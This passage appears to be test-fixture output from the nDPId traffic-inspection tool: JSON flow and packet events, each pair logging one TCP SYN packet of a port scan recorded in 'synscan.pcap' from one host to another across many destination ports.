-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsgrAAADsGisKsEAAIQA2GNIzSAobdUoMYAAAAAGACEAAmCQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs298AADUGN5OsEAAIQA2GNIzSK2fdUoMYAAAAAGACCAAFKAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMQEAACkG7nGsEAAIQA2GNIzSJtjdUoMYAAAAAGACCAAJtwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs4TUAACcGQD2sEAAIQA2GNIzSB0bdUoMYAAAAAGACEAAhSQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAssXUAADAGZv2sEAAIQA2GNIzSH6TdUoMYAAAAAGACBAAU6wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAscLcAACsGrLusEAAIQA2GNIzSHufdUoMYAAAAAGACEAAJqAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTUAADcG3D2sEAAIQA2GNIzSgAzdUoMYAAAAAGACEACoggAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0EAADAGGTGsEAAIQA2GNIzSAKPdUoMYAAAAAGACBAAz7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMqQAACwG6c6sEAAIQA2GNIzSDOXdUoMYAAAAAGACBAAnqgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsm\/MAACcGhX+sEAAIQA2GNIzSCJjdUoMYAAAAAGACEAAf9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAspNsAADoGaZesEAAIQA2GNIzSG57dUoMYAAAAAGACDAAQ8QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsU6cAACoGysusEAAIQA2GNIzSBCndUoMYAAAAAGACDAAoZgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsZn8AAC4Gs\/OsEAAIQA2GNIzSgAjdUoMYAAAAAGACDACshgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZsAACUG\/desEAAIQA2GNIzSBOvdUoMYAAAAAGACCAArpAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDIAADEG+0CsEAAIQA2GNIzSJXvdUoMYAAAAAGACCAALFAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsglIAACkGnSCsEAAIQA2GNIzSiqzdUoMYAAAAAGACCACl4gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3cAADkGo\/usEAAIQA2GNIzSJ2LdUoMYAAAAAGACCAAJLQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsBO4AADEGEoWsEAAIQA2GNIzSAAfdUoMYAAAAAGACCAAwiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgIAADEGaXCsEAAIQA2GNIzSB93dUoMYAAAAAGACCAAosgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsRe0AADIG0IWsEAAIQA2GNIzSAdDdUoMYAAAAAGACDAAqvwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5QAADgGzN6sEAAIQA2GNIzSF4ndUoMYAAAAAGACBAAdBgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAswz8AACUGYDOsEAAIQA2GNIzSFmLdUoMYAAAAAGACCAAaLQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsL+0AAC4G6oWsEAAIQA2GNIzSH1XdUoMYAAAAAGACDAANOgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsKdMAADAG7p+sEAAIQA2GNIzSDb3dUoMYAAAAAGACBAAm0gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 